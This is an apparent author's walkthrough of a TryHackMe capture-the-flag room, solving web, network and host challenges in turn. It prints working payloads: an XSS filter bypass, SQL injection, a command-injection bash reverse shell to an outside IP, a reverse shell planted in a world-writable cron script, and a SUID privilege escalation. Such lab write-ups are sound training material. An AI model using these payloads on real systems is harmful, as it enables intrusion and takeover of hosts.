Hello, guys. This is an upgraded version of the Hackers Assemble CTF that I created. So what’s the change:

• Hackers Assemble: https://hackers-assemble-4hd3.onrender.com/, a comprehensive package of Web Vulnerabilities.
• But this time we have included the Host and Network Part also with a pinch of Logic and Forensics, while keeping the web part, I have reduced the difficulty of the web.
• You can check out this Room on TryHackMe: https://tryhackme.com/jr/hackersassemble

WEB

Ok, so let’s start with the web.

XSS

We have a search functionality here. It is for testing the XSS, as when I enter the classic payload <script>alert()</script>, the script and alert got sanitised, and I got this warning!

• I tried many payloads, but it looks like script, alert, and onerror are blocked, so I tried a unique payload <svg onload=prompt()>. This doesn’t have the blocked character, and it bypasses the restrictions.
• So I can execute XSS, so as per the warning, I have to fetch the flag, but let’s take a look at the hint.

The JS code we have to use to get the flag is written here, which basically fetches the flag and then displays it.

I manually visited http://10.10.189.188/.fl4g.php, but it says Access Denied

So I crafted a Payload to get the flag:

<svg onload=”fetch(‘http://10.10.189.188/.fl4g.php').then(function(response) { return response.text(); }).then(function(flag) { document.body.innerHTML = flag; });”>

SQLi

There is an Admin Panel, which is restricted, and I tried brute forcing, but that doesn’t work.

So I went to the products page, there

• When I enter a ‘ in the input field, I get an SQL error.

• So I tried for SQLi on these input fields.
• I tried this payload ‘ or 1=1 -- - and dumped the secret credentials, which were left there in the products table.

• With these creds, I logged into the Admin Panel and got the flag.

Hidden flag

So the question says, “Where am I? Hiding behind hidden paths, yeah, you may find listing some crazy things”.

So I ran dirb on the site and found out there was a directory named /assets, on which directory listing is enabled

There is a file called Hidden. I went through it, and it has the flag.

Command Injection

I see a check connectivity utility, which checks if any IP is up or not, but the output looks very much similar to the ping command in Linux, so the server might be using our input in the ping command directly.

So I tried various command separators with the whoami command, ; && & | || I tried all of them and & works for me.

So I decided to throw a reverse shell here, and I got one.

• I ran an nc listener: nc -nvlp 12345
• I entered this input with the command: 127.0.0.1$(bash -c “bash -i >& /dev/tcp/10.17.11.227/12345 0>&1”)

• The flag was in the www-data’s home dir.

Network

On running a full port scan, then a service on the open ports, I got his output.

nmap 10.10.189.188 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-01 15:13 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.11% done
Stats: 0:03:49 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 28.57% done; ETC: 15:26 (0:09:33 remaining)
Nmap scan report for 10.10.189.188
Host is up (0.17s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
7777/tcp  open  cbt
10021/tcp open  unknown
25000/tcp open  icl-twobase1
Nmap done: 1 IP address (1 host up) scanned in 1363.12 seconds

nmap 10.10.189.188 -p22,80,7777,10021,25000 -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-01 15:54 EDT
Stats: 0:02:40 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 15:57 (0:00:40 remaining)
Nmap scan report for 10.10.189.188
Host is up (0.18s latency).
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http          Apache httpd 2.4.52
7777/tcp  open  cbt?
10021/tcp open  ftp           vsftpd 3.0.5
25000/tcp open  icl-twobase1?
1 service unrecognized despite returning data. 

FTP

We can see that an FTP service is running on port 10021, so I attempted to reach out.

• I tried logging in with an anonymous login, and it was allowed.
• I access ftp: ftp 10.10.48.70 -p 10021 with credentials anonymous:anonymous
• But I was only able to see an image file here, but I am unable to get it as it is a large file, so my ftp gets stuck
• upon thinking a lot, I try ls -al and see a hidden file named .flag.txt

• I get the flag onto my machine and read it.

Integer Overflow puzzle

The question states that there is a fishy port open.

• We have two unidentified ports here, 25000 and 7777, so I tried connecting them via nc for banner grabbing: nc <ip> 7777

• On Port 7777, there is a binary running
• When I enter small numbers, it sums them up and gives me the output, but when I enter a large number, it says large number.

• So I tried entering the highest value an integer can hold

• I got the flag, but it was encrypted with ROT13 encryption, so I went to dcode.fr and decrypted it and got the flag

Host

From the shell we have from OS command Injection, we shall start spreading out legs on the target Host.

User Flag

On Checking Crontabs on the system, I found a cron job running as ctfuser every minute.

www-data@hackersassemble:/var/www/html$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * ctfuser /home/ctfuser/maintenance.sh

• On checking the file’s permission, on which the crontab was set, I found out that anyone can execute it. It has read, write and execute permission for all the users.

• So I then added a reverse shell into this file and waited for the cron job to execute, and got a reverse shell as ctfuser
• echo “sh -i >& /dev/tcp/<yourIP>/8888 0>&1” >> /home/ctfuser/maintenance.sh

• I went to the home directory of ctfuser and got the flag

Root Flag

I first spawned a Python pty shell.

• python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
• I looked for binaries that have SUID set on them: find / -perm -4000 -type f 2>/dev/null

• I found a binary named watch, so I looked into GTFObins and found a way to escalate privilege using this binary.
• I ran the command and got a root shell: watch -x sh -p -c 'reset; exec sh -p 1>&0 2>&0'

• I got an error, but with the help of ChatGPT, I first set a standard terminal type and ran the command and got a root shell.

Hidden Root Flag

• We have already stumbled upon the same thing in FTP, so I did ls -al and got the hidden flag.

I hope you liked this Room. Show some, I might bring some more rooms like this and this time, more difficult and broader. If you need challenges for anything special, drop a comment.

Do follow me on LinkedIn: Let’s Grow Together : https://www.linkedin.com/in/abhishek26gupta/